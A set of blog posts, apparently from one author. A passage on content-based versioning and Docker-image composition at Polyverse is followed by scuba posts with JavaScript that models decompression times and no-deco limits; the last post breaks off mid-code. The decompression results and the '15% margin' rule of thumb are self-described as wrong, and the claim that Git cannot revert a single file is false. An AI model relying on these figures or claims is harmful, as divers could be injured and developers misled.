    However, once the feature was broken, and because there was an implied but unspoken model of “later is better”, nobody wanted to use the word “revert”. In fact, it was a taboo word that would be taken very personally by any committer. At some point, other people started to pile on to the same build in order to take advantage of the release (because the next release was still a month away.) This soon degraded into a cycle where we delayed the release by about 3 weeks, and in frustration we pulled the trigger and deployed it, because reverting was not in the vocabulary — I might have just called the committer a bunch of profane names and an imbecile and a moron and would have been better off.
  2. The event led to the very first Sev-1 of my life at 4am on one fateful morning. For the uninitiated, a Sev-1 is code for “holy shit something’s broken so bad, we’re not making any money off Amazon.com.”
    After four hours of investigation it turned out that someone had made a breaking API change in a Java library, and had forgotten to bump up the version number — so when a dependent object tried to call into that library, the dispatch failed. Yes, we blamed them and ostracized them, and added “process” around versioning, but that was my inflection point — it’s so stupid!
    What if that library had been a patch? What if it had 3 specific patches but not 2 others? Does looking at version “2.4.5-rc5” vs “2.4.5-rc4” tell you that rc5 has more patches? Fewer patches? Is more stable? Which one is preferable? Are these versions branch labels? Git tags? How do you ensure someone didn’t reassign that tag by accident? Use signed tags? All of this is dumb and unnecessary! The tool gives you PRECISE content identifiers. It was fundamentally built for that! Why not use it? Back in SVN/CVS/Perforce, we had no ability to specifically point to a code snapshot, and it was time we broke the habits we picked up because of that. This is why Git does not allow reverting a single file. 🙂

The key takeaway here was — these are not development concerns. We conflated release concerns with identity concerns. They are not the same. First, we need a way to identify and speak about precisely the same thing. Then we can assert over that thing the various attributes and qualities we want.

We didn’t want people to have to go through undue process to make rapid changes. What’s wrong with making breaking API changes? Nothing at all! That’s how progress happens. Developers should be able to have a bunch of crazy ideas in progress at all times, and commits should be cheap and easy! They should also have a quick, easy and reliable way of throwing their crazy ideas over the wall to someone else and saying, “Hey, can you check this version and see how it does?”, without having to go through a one-page naming-convention doc and updating metadata files. That was just so medieval!

What about dependency indirection? One reason people use symbolic references (like semantic versioning) is so that we can refer to “anything greater than 2.3.4” and not worry about the specific thing that’s used.

For one, do you REALLY ever deploy to production and allow late-binding? As numerous incidents have demonstrated, no sane Ops person would ever do this!

In my mind, having the ability to deterministically talk about something, far outweighs the minor inconvenience of having to publish dependency updates. I’ll describe how we handle dependencies in just a minute.

Heavy reliance on Feature Detection

Non-linear, content-based versioning clearly raises red flags, especially when you’re built around an actor-based model of microservices passing messages all over the place.

However, there’s been a solution staring us right in the face for the past decade. One that we learned from the web developers — use feature detection, not version detection!

When you have loosely-coupled microservices that have no strict API bindings, but rather pass messages to each other, the best way to determine if a service provides a feature you want, is to just ask it!

We found quite easily that when you’re not building RPC-style systems (and I consider callbacks to still be an RPC-style system), you don’t even need feature detection. If a service doesn’t know what to do with a message, it merely ignores it, and the feature simply doesn’t exist in the system. If you’re not waiting for a side-effect (not just syntactically, but even semantically), you end up with a very easy model.
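As a language-agnostic illustration (our services aren’t written in C, and these message names are made up), the “ignore what you don’t understand” contract is really just a dispatch loop with a do-nothing default:

#include <stdio.h>

typedef enum { MSG_START_SCRAMBLE, MSG_ROTATE_KEYS, MSG_UNKNOWN } msg_type;

typedef struct {
    msg_type type;
    const char *payload;
} message;

/* A service handles what it knows and quietly drops the rest.
   Senders never need to ask what version you are; they just send. */
static void handle(const message *m) {
    switch (m->type) {
    case MSG_START_SCRAMBLE:
        printf("scrambling: %s\n", m->payload);
        break;
    case MSG_ROTATE_KEYS:
        printf("rotating keys\n");
        break;
    default:
        /* Unknown message: log and drop. The "feature" simply does not
           exist in this deployment. */
        fprintf(stderr, "dropping unknown message type %d\n", m->type);
        break;
    }
}

int main(void) {
    message old_feature = { MSG_START_SCRAMBLE, "all binaries" };
    message new_feature = { MSG_UNKNOWN, "something this build predates" };
    handle(&old_feature);
    handle(&new_feature);
    return 0;
}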

Now that comment in the previous section about a developer being able to throw a version over the wall and ask another developer what they thought of it, makes a lot more sense. Someone can easily plug in a new version very easily into the system, and quickly assert whether it works with the other components and what features it enables.

This means that at any given time, all services can arbitrarily publish a bunch of newer features without affecting others for the most part. This is also what allows us to have half a dozen things in progress at all times, and we can quickly test whether something causes a regression, and whether something breaks a scenario. We can label that against a “version” and we know what versions don’t work.

Naturally this leads us to a very obvious conclusion: “taking dependencies” is no longer required at the service/component level. They wouldn’t be loosely-coupled, actor-model-based, Erlang-inspired microservices if they had dependency trees. What makes more sense is…

Composition, not Dependencies

When you have content-based non-linear versioning allowing aggressive idea execution, combined with services that really aren’t all that concerned about what their message receivers do, and will simply log an error and drop weird messages sent to themselves, you end up with a rather easy solution to dependency management — composition.

If you’ve read my previous posts, or if you’ve seen some of our samples, you’ll have noticed a key configuration value that shows up all over the place called the VFI. It’s a JSON blob that looks something like this:

{
  "etcd": {
    "type": "dockerImage",
    "address": "quay.io/coreos/etcd:v3.1.5"
  },
  "nsq": {
    "type": "dockerImage",
    "address": "nsqio/nsq:v0.3.8"
  },
  "polyverse": {
    "type": "dockerImage",
    "address": "polyverse-runtime.jfrog.io/polyverse:0e564bcc9d4c8f972fc02c1f5941cbf5be2cdb60"
  },
  "status": {
    "type": "dockerImage",
    "address": "polyverse-runtime.jfrog.io/status:01670250b9a6ee21a07355f3351e7182f55f7271"
  },
  "supervisor": {
    "type": "dockerImage",
    "address": "polyverse-runtime.jfrog.io/supervisor:0d58176ce3efa59e2d30b869ac88add4467da71f"
  },
  "router": {
    "type": "dockerImage",
    "address": "polyverse-runtime.jfrog.io/router:f0efcd118dca2a81229571a2dfa166ea144595a1"
  },
  "containerManager": {
    "type": "dockerImage",
    "address": "polyverse-runtime.jfrog.io/container-manager:b629e2e0238adfcc8bf7c8c36cff1637d769339d"
  },
  "eventService": {
    "type": "dockerImage",
    "address": "polyverse-runtime.jfrog.io/event-service:0bd8b2bb2292dbe6800ebc7d95bcdb7eb902e67d"
  },
  "api": {
    "type": "dockerImage",
    "address": "polyverse-runtime.jfrog.io/api:ed0062b413a4ede0e647d1a160ecfd3a8c476879"
  }
}

NOTE: If you work at Amazon or have worked there before, you’ll recognize where the word came from. When we started at Polyverse, I really wanted a composition blob that described a set of components together, and I started calling it a VFI, and now it’s become a proper noun. It really has lost all meaning as an acronym. It’s simply its own thing at this point.

What you’re seeing here is a set of components that describes, as you guessed it, the addresses where they might be obtained. In this example, the addresses are symbolic — they’re Docker image labels; however, in highly secure deployments we use the one true way to address something — content-based shas. You might easily see a VFI that has “polyverse-runtime.jfrog.io/api@sha256:<somesha>” in the address field.

Again, you’ll notice that this isn’t a fight against proper dependencies, but rather an acknowledgement that “router” is not where information for “all of polyverse working” should be captured. It is a proper separation of concerns.

The router is concerned with whether it builds, passes tests, boots up and has dependencies it requires for its own runtime. What doesn’t happen is a router taking dependencies at the component level, on what the container manager should be, could be, would be, etc. And more so, it does not have the burden of ensuring that “cycling works”.

Too often these dependency trees impose heavy burdens on developers of a single component. In the past I’ve seen situations where, if you’re a web-server builder and you get a broken downstream dependency related to authentication, you are now somehow de-facto responsible for paying the price of the entire system’s end-to-end working. It means that the burden of work increases as you move further upstream, closer to your customer. One bad actor downstream has you paying the cost. Sure, we can reduce the cost by continually integrating faster, but unless “reverting” is an option on the table, you’re still the person who has to do it.

This is why Security teams are so derided by the Operations teams. Until recently and the advent of DevSecOps, they always added a downstream burden — they would publish a library that is “more secure” but breaks a fundamental API, and you as the developer, and occasionally the operator paid the price for updating all API calls, testing and verifying that everything works.

Our VFI structure flips this premise on its head. If the router developer has a working VFI, and somehow the downstream container-manager developer broke something, then their “version” in that VFI is not sanctioned. The burden is now on them to go fix it. However, since the router doesn’t require a dependency update or a rebuild, simply plugging their fixed version into the VFI is sufficient to get their upgrade pushed into production quite easily.

You’ll also notice how this structure puts our experimentation ability on steroids. Given content-based versioning, and feature-detection, we can plug a thousand different branches, with a thousand different features, experiments, implementations, etc. in a VFI, and move rapidly. If we have to make a breaking change to an API, we don’t really have to either “freeze a branch” or do code lockdowns. We just replace API V1 with V2, and then as various components make their changes, we update those in the VFI and roll out the change reliably, accurately, predictably, and most importantly, easily. We remove the burden on the API changer to somehow coordinate this massive org-wide migration, and yet we also unburden the consumers from doing some kind of lock-step code update.

All the while, we preserve our ability to make strict assertions about every component, and an overall VFI — is it secure? is it building? Is it passing tests? Does it support features? Has something regressed? We further preserve our ability to know what is being used and executed at all times, and where it came from.

Naturally, VFIs themselves are content-versioned. 🙂 You’ll find us sending each other sample VFIs like so: Runtime@b383463cf0f42b9a2095b40fc4cc597443da47f2

Anyone in the company can use our VFI CLI to expand this into a json-blob, and that blob is guaranteed to be exactly what I wanted someone else to see, with almost no chance of mistake or miscommunication.

Isn’t this cool? We can stay loosey-goosey and experimentally hipster, and yet talk precisely and accurately about everything we consume!

You’ll almost never hear “Does the router work?” because nobody really cares if the router works or not. You’ll always hear conversations like, “What’s the latest VFI that supports scrambling?”, or “What’s the latest stable VFI that supports session isolation?”

Assertions are made over VFIs. We bless a VFI as an overall locked entity, and that is why long-time customers have been getting a monthly email from us with these blobs. 🙂 When we need to roll out a surgical patch, the overhead is so minimal, it is uncanny. If someone makes a surgical change to one component, they test that component, then publish a new VFI with that component’s version, and test the VFI for overall scenarios. The remaining 8 components that are reliable, stable, tested, see no touch or churn.

Components are self-describing

Runtime Independence

Alex and I are Erlang fanboys and it shows. 100% of Polyverse is built on a few core principles, and everything we call a “component” is really an Actor stylized strictly after the Actor Model.

A component is first and foremost a runtime definition; it is something that one can run completely on its own, and it contains all dependencies, supporting programs, and anything else it needs to reliably and accurately execute. As you might imagine, we’re crazy about Docker.

Components have a few properties:

  1. A component must always exist in a single Git repository. If it has source dependencies, they must be folded in (denormalized).
  2. Whenever possible, a component’s runtime manifestation must be a Docker image, and it must fold all required runtime dependencies into itself.

This sounds simple enough, but one very important contract every component has is that it may not know implicitly about the existence of any other component. This is a critical contract we enforce.

If there is one thing I passionately detest above all else in software engineering, it is implicit coupling. Implicit coupling is “magic”. It is when you build a component that is entirely syntactically decoupled from the rest. If Component A somehow relies on Component B existing, and acting in a very specific way, then Component A should have explicitly expressed that coupling. As an operator, it is a nightmare to run these systems! You don’t know what Component A wants, and, to keep up public displays of propriety, it doesn’t want to tell you. In theory, Component A requires nothing else to work! In practice, Component A requires Component B to be connected to it in a very specific, magical way.

We go to great lengths to prevent this from happening. When required, components are explicitly coupled, and are self-describing as to what they need. That means all our specs are in the code. If it is not defined in code, it is not a dependency.

Build Independence

We then take this runtime definition back to the development pipeline, and ensure that all components can be built with two guaranteed assumptions:

  1. That there be a “/bin/bash” that they can rely on being present (so they can add the #!/bin/bash line.)
  2. That there be a working Docker engine.

All our components must meet the following build contract:

docker build .

It really is that simple. This means that, combined with the power of content-addresses, VFIs and commit-clouds, we always have a reliable and repeatable build process on every developer’s desktop — Windows, Linux or Mac. We can be on the road, and if we need a component we can do “docker build .”. We can completely change out the build system, and the interface still remains identical. Whether we’re cross-compiling for ARM, or for an x86 server, we all have a clear definition of “build works” or “build fails”. It really is that simple.

Furthermore, because even our builders are “components” technically, they follow the same rules of content-addressing. That means at any given time you can go back two years into a Git repo, and build that component using an outdated build system that will continue to work identically.

We store all build configuration as part of the component’s repo, which ensures that when we address “router@<sha>” we are not only talking about the code, but also the exact manner in which that version needed (or wanted) to be built.

Here too you’ll notice the affinity to two things at the same time:

  1. Giving developers complete freedom to do what they want, how they want — whatever QA frameworks, scripts, dependencies, packages, etc. that they need, they get. They don’t have to go talk to the “Jenkins guy” or the “builder team”. If they want something they can use it in their builder images.
  2. Giving consumers the capacity to reason about “what” it is someone is talking about in a comprehensive fashion. Not just code, but how it was built, what tests were run, what frameworks were used, what artifacts were generated, how they were generated, etc.

Where it all comes together

Now that we’ve talked about the individual pieces, I’ll describe the full development/build/release cycle. This should give you an overview of how things work:

  1. When code is checked in it gets to be pushed without any checks and balances, unless you’re trying to get onto master.
  2. You’re allowed to push something to master without asking either, with the contract that you will be reverted if anyone finds a red flag (automation or human.)
  3. Anyone can build any component off any branch at any time they want. Usually this means that nobody is all that aggressive about getting onto master.
  4. An automated process runs the docker build command and publishes images tagged with their Git commit-shas. For now it only runs off master.
  5. If the component builds, it is considered “unit tested”; the component itself knows what it needs to run to assert that.
  6. A new VFI is generated with the last-known-good-state of working components, and this new component tag is updated in the VFI, and the VFI is submitted for proper QA.
  7. Assertions such as feature availability, stability, etc. are made over a VFI. The components really don’t know each other and don’t take version-based dependencies across each other. This makes VFI generation dirt-cheap.
  8. When we release, we look for the VFI that has the most assertions tagged around it (reviewed, error-free, warning-free, statically-verified, smoke-test-passed, patch-verified, etc. etc.)
  9. In the dev world, everyone is generating hundreds of VFIs per day, just trying out their various things. They don’t need to touch other components for the most part, and there is little dependency-churn.

I hope this post sheds some light on how we do versioning, why we do it this way, and what benefits we gain. I personally happen to think we lose almost none of the “assertions” we need to ship reliable, stable and predictable code, and at the same time simultaneously allowing all developers a lot of freedom to experiment, test, prototype and have fun.

Calling deco at the first Deco Stop

Disclaimer: These numbers are most certainly “WRONG!” You should NOT use this post or anything from a random online tool to plan or execute dives. You WILL get bent. Not “may”, but WILL. You know this. DO NOT rely on this tool.

Here’s a scenario that should never happen, but to quote the eloquent Mr. Mackey, “There are no stupid questions. Only stupid people.”

I decided to answer the following question, knowing full well that it sounds stupid:

Suppose you make it to your first deco stop and want to adjust your deco based on what happened between your max depth and hitting the deco stop. Say you had a reg failure and had to fix it. Or a scooter got entangled in the line. Or you had a reverse squeeze so you had to pause for a bit longer. Now you’re AT your deco stop, and you’ve got two things: your average depth by the time you hit the stop, and your total runtime for the dive.

Given those two numbers, if you calculated your deco from them, how much would it vary from calculating it as a true multi-level dive where you accounted for the pause as a scheduled “level stop”?

Side note: Once again, remember the purpose of these questions isn’t about what should or should never happen, but to create a strong feedback loop by understanding the cost/risk you incur when the thing that should NEVER happen does. Basically, if it turns out that stopping midway, and not keeping track of where you stopped and how long you stopped, is going to add a ridiculous amount of deco, then you HAVE to make sure you remember it. If it turns out it doesn’t add more than a few minutes of deco based on your average depth observed at your gas switch, then you can, in an emergency, get the hell up to that gas switch, switch over, and run the numbers based on what you saw then.

The Program

Here’s a quick program I whipped up which lets you do just that:

// This function is a utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
  var totalTime = 0;
  for (var index = 0; index < diveplan.length; index++) {
    var segment = diveplan[index];
    totalTime = totalTime + segment.time;
  }
  return totalTime;
}

var buhlmann = dive.deco.buhlmann();
console.log("Second Level Depth, Second Level Time, Avg Depth at Deco Stop, Multi-Level Deco Time, Avg Depth Deco Time");
for (var nextLevelTime = 5; nextLevelTime <= 30; nextLevelTime += 5) {
  for (var nextLevel = 190; nextLevel > 70; nextLevel -= 10) {
    var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("18/45", 0.21, 0.35);
    plan.addDecoGas("50%", 0.50, 0);
    plan.addDecoGas("100%", 1.0, 0);
    plan.addDepthChange(0, dive.feetToMeters(200), "18/45", 5);
    plan.addFlat(dive.feetToMeters(200), "18/45", 25);
    var bottomTime = 30; // 5 + 25 to start with
    var cumulativeDepth = (25 * 200) + (5 * 100); // Avg depth so far (25 mins at 200, and 5 minutes at 100, the mid-point when descending).

    // Add a depth change to the next level
    var depthDiff = 200 - nextLevel;
    var timeToLevel = depthDiff / 60;
    plan.addDepthChange(dive.feetToMeters(200), dive.feetToMeters(nextLevel), "18/45", timeToLevel);
    bottomTime += timeToLevel;
    cumulativeDepth += (timeToLevel * (nextLevel + (depthDiff / 2)));

    // Add a segment at the next level
    plan.addFlat(dive.feetToMeters(nextLevel), "18/45", nextLevelTime);
    bottomTime += nextLevelTime;
    cumulativeDepth += (nextLevelTime * nextLevel);

    depthDiff = nextLevel - 70;
    timeToLevel = depthDiff / 60; // This is aggressive since we won't hit 70 feet at 60 fpm
    plan.addDepthChange(dive.feetToMeters(nextLevel), dive.feetToMeters(70), "18/45", timeToLevel);
    bottomTime += timeToLevel;
    cumulativeDepth += (timeToLevel * (70 + (depthDiff / 2)));

    var avgDepthAtDecoBegin = cumulativeDepth / bottomTime;

    var decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);

    var totalTime = calculateDiveTime(decoPlan);
    var decoTimeFromMaxDepth = totalTime - bottomTime;

    plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("18/45", 0.21, 0.35);
    plan.addDecoGas("50%", 0.50, 0);
    plan.addDecoGas("100%", 1.0, 0);
    plan.addFlat(dive.feetToMeters(avgDepthAtDecoBegin), "18/45", bottomTime);
    decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    totalTime = calculateDiveTime(decoPlan);
    var decoTimeFromAvgDepth = totalTime - bottomTime;

    console.log(nextLevel + ", " + nextLevelTime + ", " + avgDepthAtDecoBegin + ", " + decoTimeFromMaxDepth + ", " + decoTimeFromAvgDepth);
  }
}

The Results (raw data)

The results I got were:

Second Level Depth, Second Level Time, Avg Depth at Deco Stop, Multi-Level Deco Time, Avg Depth Deco Time
190, 5, 181.41255605381164, 56.29999999999997, 56.52945470852016
180, 5, 180.06726457399105, 55.29999999999996, 55.488450224215235
170, 5, 178.7219730941704, 54.29999999999996, 55.4474457399103
160, 5, 177.37668161434976, 53.29999999999997, 54.40644125560536
150, 5, 176.03139013452915, 51.99999999999998, 53.36543677130043
140, 5, 174.68609865470853, 50.999999999999964, 52.324432286995496
130, 5, 173.34080717488786, 49.99999999999997, 51.28342780269057
120, 5, 171.99551569506727, 49.999999999999964, 51.24242331838564
110, 5, 170.65022421524665, 48.69999999999998, 50.20141883408069
100, 5, 169.30493273542598, 47.699999999999974, 50.16041434977576
90, 5, 167.9596412556054, 45.69999999999998, 49.119409865470836
80, 5, 166.61434977578477, 45.69999999999998, 48.0784053811659
190, 10, 182.43083003952566, 66.29999999999997, 67.56049169960473
180, 10, 180.0592885375494, 64.29999999999998, 65.48820711462449
170, 10, 177.68774703557312, 63.299999999999976, 63.415922529644256
160, 10, 175.31620553359681, 60.99999999999997, 62.34363794466401
150, 10, 172.94466403162056, 58.99999999999998, 60.27135335968378
140, 10, 170.57312252964428, 56.99999999999998, 59.19906877470354
130, 10, 168.20158102766797, 54.699999999999974, 57.12678418972331
120, 10, 165.83003952569172, 52.69999999999997, 55.054499604743064
110, 10, 163.45849802371544, 50.69999999999997, 53.98221501976284
100, 10, 161.08695652173913, 48.39999999999998, 51.909930434782595
90, 10, 158.71541501976284, 47.399999999999984, 50.837645849802364
80, 10, 156.34387351778656, 45.39999999999997, 49.76536126482211
190, 15, 183.23321554770317, 77.59999999999997, 78.58494840989397
180, 15, 180.05300353356887, 73.29999999999995, 75.48801554770316
170, 15, 176.87279151943463, 71.29999999999995, 72.39108268551234
160, 15, 173.69257950530033, 67.99999999999997, 70.29414982332155
150, 15, 170.5123674911661, 64.99999999999997, 67.19721696113072
140, 15, 167.33215547703182, 62.69999999999998, 65.10028409893991
130, 15, 164.15194346289752, 59.699999999999974, 62.00335123674911
120, 15, 160.97173144876325, 57.69999999999998, 59.90641837455829
110, 15, 157.79151943462898, 54.39999999999997, 57.80948551236748
100, 15, 154.61130742049468, 51.39999999999998, 55.71255265017666
90, 15, 151.43109540636044, 49.13359999999998, 53.61561978798586
80, 15, 148.25088339222614, 46.13359999999998, 50.518686925795045
190, 20, 183.88178913738017, 87.59999999999998, 89.60471693290735
180, 20, 180.0479233226837, 83.29999999999998, 86.4878607028754
170, 20, 176.21405750798723, 80.29999999999998, 82.37100447284345
160, 20, 172.38019169329073, 75.99999999999999, 79.2541482428115
150, 20, 168.54632587859422, 71.99999999999997, 75.13729201277954
140, 20, 164.71246006389777, 68.69999999999999, 71.0204357827476
130, 20, 160.87859424920126, 64.69999999999997, 66.90357955271564
120, 20, 157.0447284345048, 61.399999999999984, 64.78672332268368
110, 20, 153.21086261980832, 57.39999999999997, 61.66986709265175
100, 20, 149.37699680511182, 54.13359999999999, 59.5530108626198
90, 20, 145.54313099041534, 51.13359999999998, 55.43615463258785
80, 20, 141.70926517571885, 47.13359999999998, 53.319298402555894
190, 25, 184.41690962099125, 97.59999999999998, 100.6210274052478
180, 25, 180.04373177842564, 92.29999999999998, 95.48773294460639
170, 25, 175.67055393586006, 88.29999999999998, 91.35443848396503
160, 25, 171.29737609329445, 82.99999999999999, 87.22114402332359
150, 25, 166.92419825072884, 78.99999999999997, 83.08784956268224
140, 25, 162.55102040816328, 74.69999999999999, 78.95455510204081
130, 25, 158.17784256559764, 70.69999999999997, 72.82126064139943
120, 25, 153.80466472303203, 65.39999999999998, 69.687966180758
110, 25, 149.43148688046648, 61.39999999999997, 65.5546717201166
100, 25, 145.05830903790087, 57.13359999999997, 61.42137725947519
90, 25, 140.6851311953353, 53.13359999999998, 58.28808279883379
80, 25, 136.31195335276968, 49.13359999999998, 55.1547883381924
190, 30, 184.86595174262735, 108.59999999999998, 113.63471420911527
180, 30, 180.04021447721178, 102.29999999999998, 107.4876257372654
170, 30, 175.21447721179626, 96.29999999999998, 101.34053726541555
160, 30, 170.3887399463807, 90.99999999999999, 94.19344879356568
150, 30, 165.56300268096513, 85.99999999999997, 89.04636032171581
140, 30, 160.73726541554961, 80.69999999999999, 83.89927184986593
130, 30, 155.91152815013405, 75.7, 78.75218337801608
120, 30, 151.08579088471848, 70.4, 74.60509490616622
110, 30, 146.26005361930297, 65.39999999999998, 70.45800643431636
100, 30, 141.4343163538874, 60.13359999999997, 65.31091796246646
90, 30, 136.60857908847183, 56.13359999999998, 61.1638294906166
80, 30, 131.78284182305632, 51.13359999999998, 57.01674101876673

The conclusions

Here are a couple of quick conclusions I was able to draw:
1. If all you did was compute deco from your avg depth + runtime once you hit the stop, the biggest difference I could find was a little over 6 minutes, and it was in the conservative direction. Meaning, if we treated the entire dive as if it were spent at the avg depth, we’d be calling at most about 6 minutes more deco than the true multi-level schedule.
2. The maximum deviation, expressed as a percentage, was about 13 percent. Meaning adding a safe 15% margin to the avg-depth-based deco would be a good rule of thumb to cover the discrepancy.
I haven’t played with greater depths or attempted to plot/chart these to get a visual “feel” for how the curves shape up. I haven’t tried VPM.
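
As a quick sanity check on those two claims, here’s a tiny snippet that does the arithmetic for the worst row in the raw data above (second level of 80 feet for 20 minutes); the compareDeco helper is just a name I made up for illustration:

//Compare the multi-level deco time against the avg-depth deco time for one
//row of the raw data above (second level 80 ft for 20 min). The two inputs
//are copied straight from that table.
var compareDeco = function(multiLevelDeco, avgDepthDeco) {
    var absolute = avgDepthDeco - multiLevelDeco;
    var percent = (absolute / multiLevelDeco) * 100;
    console.log("Absolute difference: " + absolute.toFixed(1) + " minutes");
    console.log("Percentage difference: " + percent.toFixed(1) + "%");
}

compareDeco(47.1336, 53.3193); //prints roughly 6.2 minutes and 13.1%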

Recipes to play with “No Deco Limits”

For technical, philosophical, and every other kind of view on No-Deco limits, go to ScubaBoard.

First let me elaborate on why the mathematical model is important and how to play with it.

Models allow reverse engineering (fitting)
This post is about understanding the mathematical model in terms of the NDLs we know and use. One of the most important things about any model is that once you have verified it in one direction (how much deco must I do for a specific dive), you can run it in the other direction (how long can I dive before I have mandatory deco). You can then work out what parameters, adjustments, corrections, and variations other people were using when they came up with the numbers they gave you.

This is a subtle point, and the one that excites me the most. What this means is, if someone said to me, “Let’s dive to 100 feet, for 40 minutes, on 32%, and ascend while stopping two minutes every ten feet”, I now have the tools to guess their parameters.

Suppose they were using VPM; then I can reverse-engineer things like what bubble sizes they considered “critical”, what their perfusion rates were assumed to be, and so on. If they were using Buhlmann, I can reverse-engineer their gradient factors.
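
Here’s a minimal sketch of what that reverse-engineering could look like for the Buhlmann case, using the 100-feet/40-minutes/32% dive from above. It assumes, as the recipes later in this post do, that the second and third arguments to calculateDecompression are the GF low/high; the 20-minute target deco and the one-minute tolerance are numbers I made up purely for illustration:

//Utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
    var totalTime = 0;
    for (var index = 0; index < diveplan.length; index++) {
        totalTime = totalTime + diveplan[index].time;
    }
    return totalTime;
}

var targetDecoTime = 20; //the deco (in minutes) the other diver's schedule implied - made up here

var buhlmann = dive.deco.buhlmann();
for (var low = 1; low <= 9; low++) {
    for (var high = low; high <= 9; high++) {
        var gfLow = low / 10;
        var gfHigh = high / 10;
        var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
        plan.addBottomGas("32%", 0.32, 0.0);
        plan.addFlat(dive.feetToMeters(100), "32%", 40);
        var decoPlan = plan.calculateDecompression(false, gfLow, gfHigh, 1.6, 30);
        var decoTime = calculateDiveTime(decoPlan) - 40;
        //any GF pair that lands within a minute of the target is a plausible fit
        if (Math.abs(decoTime - targetDecoTime) < 1) {
            console.log("Plausible gradient factors: " + gfLow + "/" + gfHigh);
        }
    }
}

With only one profile to match you’ll usually get a family of plausible GF pairs; the more profiles you have from the same person, the more the fit narrows.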

This is awesome because it allows me to break down the black box a little – instead of whining about “My computer said 10 minutes, and yours said 20 minutes”, I can whine in a far more specific and deeply annoying way – “Oh I see, my computer is assuming critical He bubble size to be 0.8 microns, but yours is assuming 0.5 microns.” Remember kids – you shouldn’t always whine, but when you do, make it count!

When your computer has a “conservatism factor”, what does that mean? Is it simply brute-multiplying each stop by that factor? Is it multiplying only the shallow stops? Is it a coefficient in a curve-fitting step, say if the computer is fitting something like a spline or bezier to “smooth out the ascent”? A conservatism factor of “4” tells you far less about what’s going on than a plain statement of “these are the adjustments/corrections I make.”

While these ARE “just models”, models are nothing if they are not properly parameterized.

Here again, existing software fell short in what I could do with it. The GUI is a great tool for a narrow, specific task. But when exploring the model, nothing is more useful and powerful than being able to play with it programmatically. Once I begin posting recipes you’ll see what is so fascinating about “playing with it”.

If you’re a fan of Mythbusters, you’ll have seen them refer to this as “producing the result”.

Models allow study of rates-of-change (sensitivity analysis)

The other very important aspect of a model, even if its constants are wrong, is the overall rate of change, or growth. This is also called sensitivity analysis (i.e., how sensitive is my model to which parameters).

Let us say we had a few things in our control – ppO2, ppN2, ppHe, bottom time, ascent rate, descent rate, stops.

What a mathematical model allows us to learn (and should help us learn), is how sensitive the plans are to each of these parameters, even if specific constants are wrong.

Let me put it this way – if you wanted to gauge the sensitivity of a “car” to things like weight, number of gear shifts, size of wheels, etc., and you had a Hummer to study with but had to somehow extend that knowledge to a sedan, how would you do it?

The “constants” are different in both. But the models aren’t. An internal combustion engine has an ideal RPM where it provides the maximum torque for minimum fuel consumption. The specific rev rate will be different, and you can’t account for that. However, the “speed at which inefficiency changes” is common to all internal combustion engines. Unless the sedan is using a Wankel engine, the rate-of-change characteristics still apply. Even if the Hummer’s ideal RPM is 2000 and the sedan’s is 1500, we can still ask: when I deviate 10% from the ideal, how does that affect fuel consumption and torque?

So even if the software/constants I wrote are entirely wrong (which they probably are), they still serve as a valuable tool for studying these changes.
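
To make that concrete, here’s a minimal sketch using the same library calls as the recipes below. It nudges one parameter – bottom time – by 10% in each direction and reports how much the deco obligation moves; the 150-foot/30-minute baseline and the gases are arbitrary:

//Utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
    var totalTime = 0;
    for (var index = 0; index < diveplan.length; index++) {
        totalTime = totalTime + diveplan[index].time;
    }
    return totalTime;
}

//Deco time for a flat 150-foot dive on 21/35 with 50% and O2 as deco gases
var decoForBottomTime = function(time) {
    var buhlmann = dive.deco.buhlmann();
    var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("2135", 0.21, 0.35);
    plan.addDecoGas("50%", 0.50, 0);
    plan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    plan.addFlat(dive.feetToMeters(150), "2135", time);
    var decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    return calculateDiveTime(decoPlan) - time;
}

var baseline = decoForBottomTime(30);
var plusTen = decoForBottomTime(33);  //+10% bottom time
var minusTen = decoForBottomTime(27); //-10% bottom time

console.log("Deco for 30 min at 150 ft: " + baseline + " min");
console.log("+10% bottom time moves deco by " + ((plusTen - baseline) / baseline * 100).toFixed(0) + "%");
console.log("-10% bottom time moves deco by " + ((minusTen - baseline) / baseline * 100).toFixed(0) + "%");

Even if the absolute minutes are junk, that percentage change is exactly the kind of rate-of-change observation that survives bad constants.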

A study in NDLs

Naturally, one of the first unit tests I wrote for the algorithm was the PADI dive tables: https://github.com/nyxtom/dive/blob/master/test/dive_test.js#L646

The point here was to recreate an approximation of the dive tables. What fascinated me was how much subtle understanding there is behind that number though.

First let’s define an NDL as: Maximum time at a depth, with an ascent ceiling of zero.

What this means is, whether you use Buhlmann, or VPM, or whatever model you like, the NDL is the longest time for which you can still ascend straight to the surface (to a depth of zero meters).

So what happens when we run pure Buhlmann without a gradient factor?

(This snippet is meant to be executed here: http://deco-planner.archisgore.com/)

var buhlmann = dive.deco.buhlmann();
var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
plan.addBottomGas("Air", 0.21, 0.0);
plan.ndl(dive.feetToMeters(100), "Air", 1.0);

//Result is 16

That’s a bit strange isn’t it? The official NDL on air is closer to 19 or 20 minutes (with a “mandatory safety stop”.)

Does it mean my model is wrong? My software is wrong? Compare it with different depths, and you’ll find it gives consistently shorter NDLs. What gives?

Let’s try fudging the conservatism factor a bit.

var buhlmann = dive.deco.buhlmann();
var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
plan.addBottomGas("Air", 0.21, 0.0);
plan.ndl(dive.feetToMeters(100), "Air", 1.1);


//Result is 19

That’s just about where we expect it to be. This tells me that the NDL could have been computed with a less conservative factor. But is there something I’m missing?

Wait a minute, this assumes you literally teleport to the surface. That’s not usually the case. Let’s run the same NDL with a 30-feet-per-minute ascent (this time we have to use the getCeiling method).

for (var bottomTime = 1; bottomTime <= 120; bottomTime++) {
    var buhlmann = dive.deco.buhlmann();
    var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("Air", 0.21, 0.0);
